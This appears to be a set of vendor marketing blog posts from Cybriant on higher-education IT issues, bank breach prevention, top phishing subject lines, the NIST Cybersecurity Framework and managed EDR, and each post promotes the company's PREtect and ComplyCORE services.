Cyber Risk Management Solutions
The Top IT Issues Facing Higher Education Institutes In 2019

The Top IT Issues Facing Higher Education Institutes In 2019

Information security strategy is one of the top 10 IT issues facing educational institutes today. Find out how Cybriant can help simplify 5 of the top 10 IT issues facing colleges today.

IT issues

In an effort to improve student experiences and outcomes, EDUCAUSE gathered the 2019 Top 10 IT Issues list and dubbed it, “The Student Genome Project.” Find out more about the research here. 

Half of the Top 10 IT Issues directly involve data, along with the many challenges and opportunities it affords:

#1. Information Security Strategy: Developing a risk-based security strategy that effectively detects, responds to, and prevents security threats and challenges

#3. Privacy: Safeguarding institutional constituents’ privacy rights and maintaining accountability for protecting all types of restricted data

#5. Digital Integrations: Ensuring system interoperability, scalability, and extensibility, as well as data integrity, security, standards, and governance, across multiple applications and platforms

#6. Data-Enabled Institution: Taking a service-based approach to data and analytics to reskill, retool, and reshape a culture to be adept at data-enabled decision-making

#8. Data Management and Governance: Implementing effective institutional data-governance practices and organizational structures

We must map the student genome. We must trust and understand our data to apply it, for without data, we are blind.

Some of the work is tactical and technical. Projects are under way to develop shared, consistent data definitions and sources and to integrate those sources across many systems and, often, across competing versions. Much of the work is strategic and political. Technical silos are easier to bridge than organizational silos. Stakeholders must agree on data definitions and definitive, trusted sources. They must acknowledge the precedence of the institution over the department if the goal is to become a data-enabled institution.

The most difficult work is cultural. Cultures are social constructs that link, transcend, and outlast individuals. People are difficult to change, cultures even more so. Applying data to decision-making requires entirely new ways of making decisions, of working, of thinking. Doing so requires culture change, and that calls for leadership, a coalition, empathy, and grit.

Data privacy is newly on the list, and no wonder. Institutions are scrambling to interpret and comply with the European Union’s General Data Protection Regulation (GDPR), which contains new requirements for data collection, processing, and use. The state of California quickly followed with its California Consumer Privacy Act (CCPA), and support for a comprehensive US federal privacy law appears to be gaining traction. Millions of people have been appalled by revelations of exactly how much end-user data Facebook collects, how it has used this data to manipulate online experiences, and how it has exposed this data to third parties. This type of data use is not new, but it is newly salient. Privacy vulnerability is the dark side of collecting and using the increasing types and amounts of student data.

And then there is the issue of security. Again. Still. For several years, security has been not just on the EDUCAUSE Top 10 IT Issues list but has topped the list. Data can be trusted only if it is secured. Security threats adapt to and overcome existing protections, requiring continual monitoring and ongoing investments. Security is a risk that will never be fully prevented, but it can be managed.

Cybriant offers solutions for all five of those IT issues that fall under the trusted data scenario. Continue reading to find out more. 

1. IT ISSUES: Information Security Strategy

Developing a risk-based security strategy that effectively detects security threats and challenges respond to them and prevent them

It is an extremely high priority to secure our institutional data and systems. Threats are on the increase. We must speed up our efforts to integrate security into all aspects of our IT strategy and activities. An effective strategy for information security will use a risk-focused, multi-layered strategy to secure the institution. This takes a village – everyone has to participate. It is not the task of only the IT organization or the Chief Security Officer for Information (CISO). If we do our part, we can make much more progress in securing our institutions.

Risk is the most important word. These are not small risks. Information security is often ranked on institutional risk maps in the upper right quadrant. A major breach can seriously damage the reputation and financial health of the institution.

“Far too often, security is perceived as an IT problem. It truly is not. If we look at information security as an enterprise-wide risk, then we must have other stakeholders (outside of the IT organization) sitting around the table to determine how best to manage security-related risks. These stakeholders also need to determine how much risk the institution can accept. IT leaders cannot make this decision alone.”

—Cheryl Washington, Chief Information Security Officer, University of California, Davis

Start with a Strategy

We can’t stress this enough, strategy and framework are the keys to a successful security plan. By having a strong information security strategy in place, every decision around IT issues will be easier. 

We prefer NIST CSF and recommend this to our clients. What is the NIST Cybersecurity Framework?
National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity (CSF), which calls for “a set of industry standards and best practices to help organizations manage cybersecurity risks.”

Organizations can use the CSF to take a risk-based approach to align their security processes with business requirements. Because the CSF is not intended to be a “one size fits all” approach, Cybriant’s solution is scalable across all organizational sizes and can be adapted for specific use across multiple industries.

Read more about NIST CSF here. 

NIST cybersecurity foundationInstitutions that can best maintain an effective risk-based security strategy will prevent significant damage to their finances, financing, and reputation. They’re more reliable. This trust benefits alumni, donors, parents, students and granting agencies. These institutions have a competitive advantage in terms of funding research grants in this area or grants where security is extremely important because of the nature of the data involved. There will be a better use of resources not spent on breaches.

Where to Begin?

We recommend starting with a gap analysis or security assessment to help find a start point and produce a map to success for all IT issues. 

NIST CSF FrameworkHiring a firm to perform a risk/security assessment can be a daunting task. With little to go on we often we fall back on the old standbys of contracting a vendor: reputation, size, certifications, etc, etc. And often that results in poor performance or obvious cookie-cutter results. How then should we approach the task of ensuring we get value from our security assessment vendor?

After years of performing risk/security assessments and gap analyses for various companies in different vendors I’ve noticed some themes and want to share six items to look for when selecting a vendor.

Read more from, “6 Considerations for Your Next Security Assessment Vendor.”


Safeguarding the institutional constituents’ privacy rights and sustaining accountability for the protection of all types of restricted data

Privacy is about properly handling personally identifiable information that institutions collect, create, store, share, use, and dispose of. Privacy affects everyone. Without sensitive personal information, institutions can’t register students, hire staff, conduct research, and complete their organizational missions. Understanding what data is being collected and how and where it is being used is central to discerning the institution’s role in safeguarding this information.

“Privacy is not the same as security. Privacy is about being able to have a say in or control over how your information is handled. People think privacy is just about protecting data; privacy is bigger than that.”

—Merri Beth Lavagnino, Director, Strategic Planning and Enterprise Risk, Indiana University

Ensuring Privacy is met through Compliance Audits

Privacy and security, while they are the same thing, they are equally important in the eyes of the US Government for compliance reasons. Is your Institute heavily regulated as most are? Then you should have a readily available resource for ensuring audits are a breeze. If you don’t, like most colleges and universities don’t, consider a compliance management system. 

Today’s compliance environment is an overwhelming assortment of never-ending checklists and to-do items. Not only are organizations required to adhere to a standard, but there are also often many standards that a company must adhere to adding additional complexity to an already frustrating situation. Pulled in many directions, today’s IT professionals often feel as they are descending into a fog of compliance.

There is also a constant stream of acronyms that businesses now must learn and adhere to be compliant. Each new entrant into the pantheon of compliance complicates and weaves an even more complex web of checklists, procedures, and policies. Each time new letters are added to our alphabet soup of regulations we must scramble to meet that specific list of requirements.

We have created a better way. Introducing ComplyCORE.

ComplyCoreComplyCORE clears the fog of compliance into a clear and concise vision. With ComplyCORE as your compliance management system each new compliance matrix that springs to life is easily and quickly integrated. There is no scrambling each time an auditor for a specific regulation appears, it’s all part of the plan.


 3. IT ISSUES: Digital Integrations

Ensuring system interoperability, scalability, and extensibility, as well as data integrity, security, standards, and governance, across multiple applications and platforms

Many years ago, institutional IT systems were simpler. Colleges and universities would build a monolithic ERP system, pour the data in, and expect everyone to use it. Today, with the proliferation of cloud applications and emerging applications in the research and academic space, many more applications are contending for data, requiring data sharing and data integration across platforms. A monolithic strategy is no longer practical. Digital integration is becoming more prominent in institutions due to the need to securely interconnect systems to avoid data duplication. IT organizations must ensure the integrity, security, and governance of the data in these disparate but interdependent applications.

“The number of integrations to deal with is staggering, and I keep challenging my team about how to reduce the ones we know about and support directly—which doesn’t count the ones we don’t know about.”

—Michael Gower, Executive Vice President for Finance & Administration, Rutgers, The State University of New Jersey

People, Process, And Technology 

When you have a framework in place, it helps direct the decision making process for all IT issues including people, process, and technology. When this is in place, institutions can focus on their main goal – education. Integrating systems in a friction point that add time, money, and detracts from your end goal. Lack of coordination and governance increases the likelihood of mistakes and missed opportunities. 

people process technologyWhat we must strive for, what we must get up every morning and make it our mission to accomplish, is the process. A far too common mistake is that once we place security controls around our data we believe the job is done. Once we buy and install that tool, outsource that task, or hire that consultant firm we are not done. Let’s look at the tried and true foundation of People, Process, Technology and see how that fits into your cybersecurity plan – we are going to switch it up and discuss process last.

According to ITIL News, using People, Process, and Technology for a successful implementation is not only good old-fashioned common sense but also like a 3-legged stool. The stool analogy is used because any leg that is too short or too long will cause an imbalance.

Read more about People, Process, and Technology. 

4. IT ISSUES: Data-Enabled Institution 

Taking a service-based approach to data and analytics to reskill, retool, and reshape a culture to be adept at data-enabled decision-making

As colleges and universities adapt to a rapidly changing future, the ability to make effective decisions may well distinguish those that navigate change successfully from those that don’t. We live in a world awash with data, yet many institutional leaders struggle to convert data into decisive and informed action. Without access to timely, accurate, and relevant data at the right time, leaders will not be able to make successful decisions. Applying data more rigorously and expansively to decision-making requires that technology and data professionals possess new skills. Institutions need professionals who are adept at discovery, pattern matching, and searching for the data inside the problem.

Higher education also has a programmatic opportunity. Analytics, AI, and machine learning are creating new jobs and disciplines.6 Technology’s impact on the needs of the impending workforce means that college and university programs have the potential for dramatic change.

“Faculty will have to work hard to adapt under a data-enabled culture. To help them, we must be transparent and clearly show how these new initiatives will benefit the students and them. We have to show evidence of IT’s value.”

—Colleen Carmean, Associate Vice Chancellor, Academic Innovation, University of Washington, Tacoma

Enable Data through Security and Compliance

It is more important than ever for data to be secure. There are two reasons – the impending doom that will follow a cyber attack if data isn’t properly secured. And failing a compliance audit for data not being properly secured. 

Data Security – consider PREtect. 

PREtect is a tiered cybersecurity service that will help optimize the protection of data assets and the detection of malicious events by addressing the most common vulnerabilities in the enterprise.

pretect cybersecurityPREtect is offered in 3 tiers:

  • CORE: Continuous cyber threat detection through Managed SIEM
  • ADVANCED: CORE plus Managed Endpoint Detection and Response
  • PREMIUM: ADVANCED plus vulnerability and patch management

Find out more about PREtect

Compliance Audits – Consider ComplyCORE

Instead of jumping from one compliance to another rushing to ensure all the boxes are ticked Cybriant helps your organization settle the noise by collapsing all the various compliance initiatives into one program. Currently meeting NIST and HIPAA compliance only to have PCI placed in your lap? Not a problem.

Through ComplyCORE, we can help you adopt clear policy statements and demonstrate clear and unequivocal expectations about compliance.

Find out more about ComplyCORE.

5. IT ISSUES: Data Management and Governance 

Implementing effective institutional data-governance practices and organizational structures

Colleges and universities are information-driven organizations. They create, transmit, and run on the flow of information. Data is the institution’s lifeblood. Like any other consequential resource, data has to be properly managed, curated, secured, understood, and optimized to help the institution achieve its mission and goals. Data tends to be invisible because it flows in and out of the business processes. But without the ability to use data to make decisions, institutions are flying blind. Effective data management and governance is the foundation on which decision support and intelligence capabilities are built.

“Institutions with effective data management and governance have built the pipeline to support effective decision-making.”

—Chris Gill, Chief Information Technology Officer, Drake University

Start with a Solid Foundation

Begin with a solid foundation – we recommend you start with a security assessment to determine any gaps in your data governance policy. The needs and abilities of the institution to use data look like a pyramid. At the base is the important data on which the institution is based. These data must be accurate, timely, secure, well understood and consistently defined throughout the institution to be useful. Any use of the data can be more harmful than beneficial on the road without this basis.

Security or risk assessments help you protect your data and develop a foundation for strategic security decisions. Consider the assessments we currently have available and let’s start a conversation about which one is right for your institution. 

More about Compliance and Security Assessments

Ready for a Cybersecurity Assessment?

Three Things Banks Need to Know About Preventing Data Breaches

Three Things Banks Need to Know About Preventing Data Breaches

Preventing data breaches could be one of the most important things your bank or financial services firm could focus on. Here are the reasons that data breaches should be a major focus.

Banks are increasingly targeted by hackers hoping to steal valuable data. Despite high threat levels and widespread knowledge of risks, many financial institutions find themselves underprepared. There are many reasons to focus on preventing data breaches, continue reading to find out a simple way Cybriant can help.

Financial services firms fall victim to cybersecurity attacks 300 times more frequently than businesses in other industries.

To make matters worse, the costs for financial institutions to repair these incidents are often far greater, which is problematic as the average data breach cost rose 5 percent to $7 million per breach in 2017. The average cost to U.S. businesses per record, lost or stolen, during a breach was $225 – compare that to the financial industry’s number of $336 per record and you can clearly see the issue.

Moreover, according to our own research studies, consumers at this point actually expect their financial service providers to offer services that reduce the chance for exposure and, as importantly, quickly rectify the situation if their data does become compromised. Of the consumers we surveyed, 50 percent said they want their bank to offer these services and 43 percent felt the same about credit unions.  


Since a data breach leads to a loss of customer faith and market reputation, it’s critical that financial institutions, including banks, protect their networks. Here are three things banks need to know about network security standards and preventing data breaches at financial institutions.

1. Many Banks Aren’t Budgeting Enough

IT staff need to be able to respond to threats, and banks that tighten the budget on IT spending cripple this mission. Unfortunately, some banks reduce IT budgets to free up more money for customer-facing web tools and apps. This move short-circuits IT’s ability to defend against a cyber attack. Banks must take threats seriously, and this means adopting stricter network security standards and adequately funding IT departments for cyber monitoring and defense. If your clients find out that you are preventing data breaches to secure their investment, they may find a new bank.

2. Two-Factor Authentication is No Longer Optional

Two-factor identification offers superior protection, but many employees dislike having to verify their identity using another method. Single-factor identification for apps and password-protected portals leaves banks vulnerable to an attack when cybercriminals have stolen legitimate user credentials.

Hackers are using more sophisticated and creative methods to easily steal login credentials. Once they have credentials, they can penetrate the system without raising any alarms.

Banks must ask themselves which is worse: the pain of having to log in via two-factor authentication or the pain of a serious data breach?

Two-factor authentication can thwart attacks. Given the low cost of implementation, it’s a no-brainer. You may even consider multi-factor authentication to ensure preventing data breaches.

3. Third-party Apps Present a Security Risk

Third-party apps promise a shortcut for financial institutions that don’t have the time or money to develop their own app, but there is a safety risk here. In the race to keep up with the competition, some banks are adopting apps that may not be up to security standards. The short-term attempt to stand out can backfire big when apps are penetrated.

No matter the perceived need to offer customers apps and online tools, there is no excuse for failing to do due diligence when it comes to security standards or compliance requirements. Approving the app to appease the staff opens up the bank to a data breach through a third-party app. To address the security gap, banks should take a two-pronged approach: First, adopt stricter policies that target weak apps and second, ensure all apps are monitored for cyber threats.

When hackers see that a bank is not an easy target, they will look for a financial institution that has unguarded access points. By addressing these security vulnerabilities, banks can reduce their risk and continue preventing data breaches.

Preventing Data Breaches Made Simple

You need to start with a cybersecurity strategy and framework. We recommend the NIST Cybersecurity Framework and have written several articles on how to use a framework in all your decision making.

People, Process, and Technology is the cornerstone of ITIL, but can it also be used to ensure a proper cybersecurity foundation? The answer may surprise you! Read more, “People, Process, Technology in Cybersecurity or: How I Learned to Stop Worrying and Love the Process!”

Once you have the framework in place, focus on your compliance needs and risk reduction. We have create a tiered service that can not only make that efficient and affordable, it can actually make cybersecurity and preventing data breaches easy.

It’s called PREtect.

PREtect is a tiered cybersecurity service that will help optimize the protection of data assets and the detection of malicious events by addressing the most common vulnerabilities in the enterprise.

PREtect is offered in 3 tiers:

CORE: Continuous cyber threat detection through Managed SIEM

ADVANCED: CORE plus Managed Endpoint Detection and Response

PREMIUM: ADVANCED plus vulnerability and patch management

Find out more about PREtect

Learn More About PREtect

Top-Clicked Phishing Email Subject Lines of Q4 2018

Top-Clicked Phishing Email Subject Lines of Q4 2018

Wondering what the top phishing email subject lines from Q4 of 2018? KnowBe4 reports on this every quarter. Take a look at the infographic, you may be surprised to see what hackers are using!

Here at Cybriant, we are no longer surprised to see the phishing email subject lines that are our users click on. Even the best, most highly trained employees can be tricked. It seems you have to be suspicious of each and every email that comes into your inbox. 

Through our PREtect ADVANCED service, we have the ability to stop any malicious activity before it can execute. 

PREtect ADVANCED is the second level of our tiered cybersecurity service, adding next-generation endpoint technology which utilizes AI and machine learning to insulate endpoint devices from malicious code while capturing and analyzing forensic data which Cybriant’s Security Engineers can then utilize to further isolate and remedy the threat.

PREtect ADVANCED features Endpoint Protection Including:

  • True Zero-Day Protection
  • AI-Driven Malware Prevention
  • Script Management
  • Device Usage Policy Enforcement
  • Memory Exploitation Detection and PRevention
  • Application Control for Fixed -Function Devices

Top Phishing Email Subject Lines

Even with this amazing service, you should always train your employees to know what to look for. According to the infographic below, the top general phishing email subject lines are: 

  1. Password Check Required Immediately
  2. Your Order with Amazon/Your Amazon Order Receipt
  3. Announcement: Change in Holiday Schedule
  4. Happy Holidays! Have a Drink On Us.
  5. Have a Drink on Us
  6. De-Activation of [[EMAIL]] in Process
  7. Wire Department
  8. Revised Vacation & Sick Time Policy
  9. Last Reminder: Please respond immediately
  10. UPS Label Delivery: 1ZBE312TNY00005011

From KnowBe4, the top security awareness training company:

KnowBe4 reports every quarter on the top-clicked phishing emails. Here we have the results for Q4 2018. We track three different categories: general email subjects, those related to social media and ‘in the wild’ attacks. The results come from a combination of the simulated phishing email subject lines used by our customers as well as from the millions of users that click our no-charge Phish Alert Button to report suspicious emails to their IT Incident Response team.

Trends That Persisted Throughout 2018

In reviewing the Q4 2018 most clicked subject lines, trends were easily identified; five subject line categories appeared quarter-over-quarter throughout 2018, including:

  • Deliveries
  • Passwords
  • Company Policies
  • Vacation
  • IT Department (in-the-wild)

Additionally, three “in-the-wild subject lines” were clicked three out of four quarters and included Amazon, Wells Fargo and Microsoft as keywords.

The Subject Lines Tell Us Users Are Concerned About Security

“Clicking an email is as much about human psychology as it is about accomplishing a task,” said Perry Carpenter, chief evangelist and strategy officer at KnowBe4. “The fact that we saw ‘password’ subject lines clicked four out of four quarters shows us that users are concerned about security.

Likewise, users clicked on messages about company policies and deliveries each quarter showing a general curiosity about issues that matter to them. Knowing this information gives corporate IT departments tangible data to share with their users and to help them understand how to think before they click.”

Here is the full InfoGraphic of top subjects in all categories for the last quarter, the top 10 most-clicked general email subjects in Q4 2018, and most common ‘in the wild’ attacks during that period.

Read the full report here. 


How to Meet the Guidelines for the NIST Cybersecurity Framework

How to Meet the Guidelines for the NIST Cybersecurity Framework

Cybriant offers tiered cyber security services through PREtect. Each service offered through PREtect has a solution that will help you meet the NIST cybersecurity framework.

Which cybersecurity framework do you use? We discussed the importance of a framework in this previous post. A framework is a standardized methodology for selecting, implementing, testing, and maintaining a set of security metrics, also called security controls. There are many frameworks to choose from; NIST, ISO, NERC, PCI, etc., etc. The point is that you want to compare yourself against a known yardstick.

We prefer NIST CSF and recommend this to our clients.

What is the NIST Cybersecurity Framework?

National Institute of Standards and Technology (NIST) Framework for Improving Critical Infrastructure Cybersecurity (CSF), which calls for “a set of industry standards and best practices to help organizations manage cybersecurity risks.”

Organizations can use the CSF to take a risk-based approach to align their security processes with business requirements. Because the CSF is not intended to be a “one size fits all” approach, Cybriant’s solution is scalable across all organizational sizes and can be adapted for specific use across multiple industries.

The Cybersecurity Framework was released in February 2014 as a result of Executive Order 13636, “Improving Critical Infrastructure Cybersecurity,” which was signed on February 12, 2013. The CSF was created through collaboration between the United States government and the private sector and places a focus on aligning business needs and priorities with cybersecurity and risk management. The CSF is comprised of three parts: the Core, the Implementation Tiers and the Profile. The Core identifies cybersecurity activities and practices that share a commonality across critical infrastructure sectors.

These activities and practices are grouped into five Functions: Identify, Protect, Detect, Respond and Recover. The Implementation Tiers provide entities with context for managing cybersecurity risks and applying a plan to their specific organization. Profiles are used to match cybersecurity objectives to business requirements, risk tolerance, and resources.

Let’s talk about PREtect.

PREtect is a tiered cybersecurity service that will help optimize the protection of data assets and the detection of malicious events by addressing the most common vulnerabilities in the enterprise.

PREtect is offered in 3 tiers:

CORE: Continuous cyber threat detection through Managed SIEM

ADVANCED: CORE plus Managed Endpoint Detection and Response

PREMIUM: ADVANCED plus vulnerability and patch management

Find out more about PREtect

It’s possible to leverage Cybriant PREtect PREMIUM to help meet the guidelines and practices outlined in the CSF through automation of its technical controls.

How to use PREtect PREMIUM to meet NIST Cybersecurity Framework Guidelines

NIST cybersecurity foundationFrom a network security feature set, PREtect PREMIUM supports over 90% of the CSF’s technical controls. With our real-time vulnerability management solution, it is also extremely powerful for communicating CSF conformance results in many different internal and external stakeholders.

PREtect gives you continuous assurance that your security program is working. Capabilities include:

  • Information on which assets are connected to the network and how they are communicating
  • Active monitoring of host activities and events, including who is accessing them and what is changing
  • Identification of previously unknown resources, changes in behavior and new application usage
  • Near real-time metrics for continuous security and compliance
  • Correlation of real-time activity with the state-based vulnerability
  • Highly customizable dashboards, reports, and workflows for rapid response
  • Communication of consolidated metrics
  • Trends across systems, services, and geographies
  • Controls team member permissions by role
  • PREMIUM analytics with actionable information and trending to prioritize events/alerts

PREtect PREMIUM enables organizations to automate the NIST Cybersecurity Framework’s technical controls by bringing active scanning and passive monitoring, configuration auditing, host event, and data monitoring and analysis, reporting and alerting together with risk classification, assessment, and mitigation in a scalable enterprise security system.

Once an organization begins to use the NIST Cybersecurity Framework Core as a baseline for its cybersecurity and risk activities, PREtect PREMIUM makes it easier to take the step towards developing a detailed Target Profile that is both achievable and manageable.

Definitions of each function are quoted from the NIST Cybersecurity Framework, and several examples are explained below.


The activities in the Identify Function are foundational for effective use of the NIST Cybersecurity Framework.

Understanding the business context, the resources that support critical functions, and the related cybersecurity risks enable an organization to focus and prioritize its efforts, consistent with its risk management strategy and business needs. Examples of outcome Categories within this Function include Asset Management; Business Environment; Governance; Risk Assessment; and Risk Management Strategy.

Using the Risk Assessment category as an example, there are three technical controls, all of which can be automated or supported with the use of PREtect PREMIUM. Subcategory ID.RA-2 requires that “Threat and vulnerability information is received on a daily basis from information sharing forums and sources.”

Through our technology partners, PREtect PREMIUM updates its vulnerability information and threat intelligence, provided by multiple third parties, on a daily basis. The Risk Assessment category has two other subcategories that state “Asset vulnerabilities are identified and documented” and “Threats, both internal and external, are identified and documented.” Both of these subcategories are also automated through active scanning, passive monitoring and event analysis.


The Protect Function supports the ability to limit or contain the impact of a potential cybersecurity event. Examples of outcome Categories within this Function include Access Control; Awareness and Training; Data Security; Information Protection Processes and Procedures; Maintenance; and Protective Technology.

Using the Information Protection Processes and Procedures category as an example, PREtect has numerous capabilities to automate the technical controls. Examples include:

  • PR.IP-1: Baselines are created and maintained
  • PR.IP-2: System development lifecycle to manage systems is implemented
  • PR.IP-3: Configuration change control processes are in place

The CSF contains 22 technical subcategories for Protect, 19 of which are automated or supported by

PREtect PREMIUM. For example, PREtect PREMIUM performs baseline audits, which allows Cybriant to scan systems based on a “standard image” by which to compare other systems, and can also alert when there are configuration changes made on endpoint devices and systems.


The Detect Function enables the timely discovery of cybersecurity events. Examples of outcome Categories within this Function include Anomalies and Events; Security Continuous Monitoring; and Detection Processes.

Using the Security Continuous Monitoring category as an example, PREtect PREMIUM has numerous automated capabilities to fulfill these controls. Examples include:

  • DE.CM-1: Network is monitored to detect potential cybersecurity events
  • DE.CM-3: Personnel activity is monitored to detect potential cybersecurity events
  • DE.CM-4: Malicious code is detected
  • DE.CM-5: Unauthorized mobile code is detected

The CSF contains 14 technical subcategories for Detect, 13 of which are automated or supported by PREtect PREMIUM. For example, through active and agent scanning, continuous listening and host data analysis, PREtect PREMIUM can observe network and user activity, detect vulnerabilities and events, and alert and report on these as part of an overall cybersecurity plan.


The Respond Function supports the ability to contain the impact of a potential cybersecurity event. Examples of outcome Categories within this Function include Response Planning; Communications; Analysis; Mitigation; and Improvements.


The Recover Function supports timely recovery to normal operations to reduce the impact from a cybersecurity event. Examples of outcome Categories within this Function include Recovery Planning; Improvements; and Communications.

The Respond and Recover Functions are comprised of categories and subcategories that are mostly administrative in nature, such as “Response plan is executed during or after an event,” “Recovery plans incorporate lessons learned,” and “Public relations are managed.” PREtect PREMIUM’s capabilities are focused primarily on the CSF’s technical controls, and although some exceptions exist, PREtect PREMIUM does not provide full support for the administrative Respond and Recover Functions.

Concurrent and Continuous Monitoring

Strong security, as prescribed in the CSF, requires broad visibility of extended networks, including IT systems, industrial control systems (ICS), virtual infrastructure, cloud, and BYOD. This visibility cannot rely solely on point-in-time data acquisition; it requires continuous, real-time data. The technology behind PREtect PREMIUM acquires security data from across organizations, using sources such as network traffic, virtual systems, mobile device management, patch management, host activity, and monitoring, as well as external sources of threat intelligence to feed an intelligent monitoring system. It analyzes this data to identify and prioritize anomalies and suspicious behavior so our team can effectively investigate and resolve them.

Get Started With PREtect

2019 Guide to Managed EDR Security

2019 Guide to Managed EDR Security

Managed EDR Security is more important in 2019 than it ever has been. Here are our top guides and recommendations for managed endpoint detection and response.

managed edr security

2019 Guide to Managed EDR Security

Endpoints are attackers’ favorite targets. They are the weakest link in your company’s network. In 2017, it was reported that the WannaCry attack exposed the vulnerabilities of 230,000 endpoints around the world. To this end, installing an endpoint detection and response or EDR is a VITAL aspect of cybersecurity for every company that needs to be proactive to modern-day threats.

What is EDR?

EDR is primarily a technology which brings a proactive approach to the issues of cybersecurity. Most traditional products are reactive to security threats—that is not the case with EDR. EDR security does a great job at monitoring endpoints in real time, hunting for threats which have found their way into the company’s defenses. You’ll also get greater flexibility as regards the happenings on endpoints and even the mechanism to help mitigate the attacks.

One of the common tactics synonymous with cybercriminals is the compromise of endpoints, which enables them to create a foothold on the network. With rapid detection and subsequent response to such attacks targeting hosts— laptops, desktops, and servers– you can be a step ahead in securing your IT infrastructure.

What is Managed Detection and Response?

Managed detection and response security is a service that exists because organizations need resources to take into cognizance risks and also improve on their ability to detect and respond to threats.

Companies have a set of tools and procedures that they employ in the detection and response to threats. But all MDR come with similar characteristics:

  • MDR is more concerned with threat detection, instead of compliance.
  • Services are delivered by using the tools and technologies of the provider—but deployed on the premises of users.
  • MDR is highly dependent on security event management and also advanced analytics
  • MDR is associated with incident validation and remote response.

Why Choose Managed Endpoint Security?

With the level of cybersecurity breaches, your company’s ability to detect and respond to threat is critical. Lacking the complete picture of what is going on across your environment, might put you in a vulnerable position when threat surfaces.

Managed Endpoint Security Benefits

  • Improving detection capabilities—not just network-based monitoring
  • Identify threats beyond traditional preventative security
  • Finding the root cause of attacks quickly and effectively
  • Looking out for threats with suspicious behavioral patterns
  • Separating infected hosts from a network

How Secure is EDR?


Technology is increasingly becoming sophisticated, and cybercriminals are also getting better at their game to keep up. Cyber threats are evolving, and antivirus no longer has the same level of protection it once did—detecting suspicious activity and also protecting your device against malware. Cybercriminals are deploying advanced threats to get ahead in this game. Verizon’s 2017 Data Breach Investigations Report puts it that over half of the breaches are malware related, and after one year, their 2018 Data Breach Investigations Report  records only 31% as the included malware.

It then becomes expedient to actively monitor behavioral events at the endpoint level, which is now the new standard. Using EDR security in conjunction with AV allows you to detect abnormal behavior, including an excellent indicator of compromise which AV solution is not capable of detecting.

3 Types of Attacks That AV Will not detect

  1. Zero-day attacks

It is as good as it sounds; it opens up as soon as the weakness is established in AV protection. Hence, before a fix is done, it is exploited. AV may detect a malware signature (continuous sequence bytes that is within the malware), but with a zero-day attack manipulation, sneaking past traditional AV is an easy feat.

  1. Ransomware attacks

Ransomware attacks deal with software downloaded with the help of an unsuspecting victim through an email attachment which has been infected—like a Microsoft word document. AV cannot protect against ransomware; sometimes it is difficult for the signature of malware to be recognized.

  1. Fileless malware attacks

Fileless malware attacks happen on existing Window tools instead of malicious software that is installed on the victim’s computer. As a result, the AV has no signature to pick on.

Why Managed EDR Security Will Detect These Attacks 

Regardless of the kind of malware or virus introduced, EDR security cares less—only cares about the existing behavior. If behavior indicates a suspicious activity, EDR will immediately send alert having identified it. The monitoring of indicators that give a sense of malicious activity will continue to protect against the further threat.

AV protection cannot be relegated to the background, but combining with EDR gives a depth approach as regards your overall security apparatus.

Managed EDR Security to boost Existing Security

MDR is offered to augment the existing security infrastructure and also contain threats that could bypass traditional control. Threats such as network attacks, fileless malware, targeted attacks, etc., are fashioned in such a way that it is difficult to detect.

Most organizations are more concerned with where threat enters and exit the network. But most often than not the lateral movements of threat is less attended to when they enter the system.

Managed EDR security does not in any way replaces the traditional ant-virus software; it supplements it—works together with anti-virus, blocking obvious threat indicators. These types of security threats cannot be tamed by conventional security controls, especially those associated with continuous detection and also response. EDR cannot block threats but can carry out root cause analysis and possibly identify the devices that have been infected.

Typical use cases for Managed Endpoint Detection and Response

  • Identifying and subsequent blockage of Malicious Executables
  • Control of executing scripts– where, how, and who
  • Managing the use of USB devices and preventing use of uthe nauthorized devices
  • Disabled attackers’ ability to use various techniques of fileless malware attack
  • Prevention of malicious email attachment
  • Identify and prevent zero-day attacks successfully.

Merging SIEM with EDR

Organizations are gradually moving from SIEM (Security Information and Event Management)–even the security providers—to EDR (Endpoint Detection and Response). However, it may not be the best decision to take regarding security of your IT infrastructure. These technologies are quite similar but different fundamentally. The EDR may be a fantastic technology, but it does not suffice for replacing SIEM.

To speedily understand the full scope of an attack, one could merge SIEM and EDR and monitored from a single console.

Why should we deploy multiple tools—whose integration barely happens—if we don’t have to?

In today world, traditional SIEMs which depends on logs and related correlation rules find it challenging to detect sophisticated attacks. The combination of logs, endpoint data, and network packet, etc., can go a long way to automate threat detection and avail the security team the opportunity to investigate advance attacks. Several SIEM is without this combination or better still, they come up with a weak add-on and assume they have a complete solution. This barely sufficient for your infrastructure and you may soon find yourself in an uncompromising state.

As cyber threats continue to manifest in different ways, your security strategy should be fine-tuned to conform to current challenges. While endpoint security may be vital to your IT architecture, there is a need to ensure that emerging threats and unwanted applications are not jeopardizing your company’s reputation or profits. Having a system that detects and responds rapidly to modern-day threats is indeed undebatable!

Stop Advanced Threats at the Endpoint

The Ultimate List of Effective Cyber Security Monitoring Tools

The Ultimate List of Effective Cyber Security Monitoring Tools

Are you prepared to defend your entire organization against the bad guys? Check out our list of cyber security monitoring tools to be sure. 

cyber security monitoring tools

Cyber Security Monitoring is a huge responsibility for every business no matter the size. You must be prepared to defend against malware, hackers, internal sources, and so much more.

Be sure you have these cyber security monitoring tools in place:


Security Information and Event Management (SIEM) – A SIEM platform centrally collects data from multiple devices on your network, including your existing security appliances. Through an advanced correlation engine, it is able to proactively identify security events not otherwise detected by standalone security technology.

A SIEM system centralizes logging capabilities on security events for enterprises and is principally used to analyze and/or report on the log entries received. The analysis capabilities of SIEM systems can detect attacks not discovered through other means and can direct the reconfiguration of other enterprise security controls to plug holes in enterprise security. Some of the top SIEM products — assuming an attack is still in progress — can even stop detected security breaches.

SIEM is one of the ultimate cyber security monitoring tools and collects data in multiple ways from your system or network, including your existing security appliances. Your SIEM gives us a “Big Picture” of your all security events. With the right security experts monitoring your SIEM, you’ll know when and where an event occurs.

Managed SIEM is included in PREtect CORE. Find out more here. 

Free Research Tools

There are many free research tools available to research cybersecurity threats that are effective cyber security monitoring tools. The key factor is that the person doing the research needs to have a comprehensive knowledge of all the pieces involved. AlienVault Open Threat Exchange is the neighborhood watch of the global intelligence community. It enables private companies, independent security researchers, and government agencies to openly collaborate and share the latest information about emerging threats, attack methods, and malicious actors, promoting greater security across the entire community.

Check it out here:

Trained Experts

Of all the cyber security monitoring tools available, having a trained expert on your team could be one of the most critical. A common mistake we see is when organizations add cyber security monitoring to their overstaffed IT team’s plate. Untrained employees aren’t able to resolve cyber security issue immediately or even know what to look for.

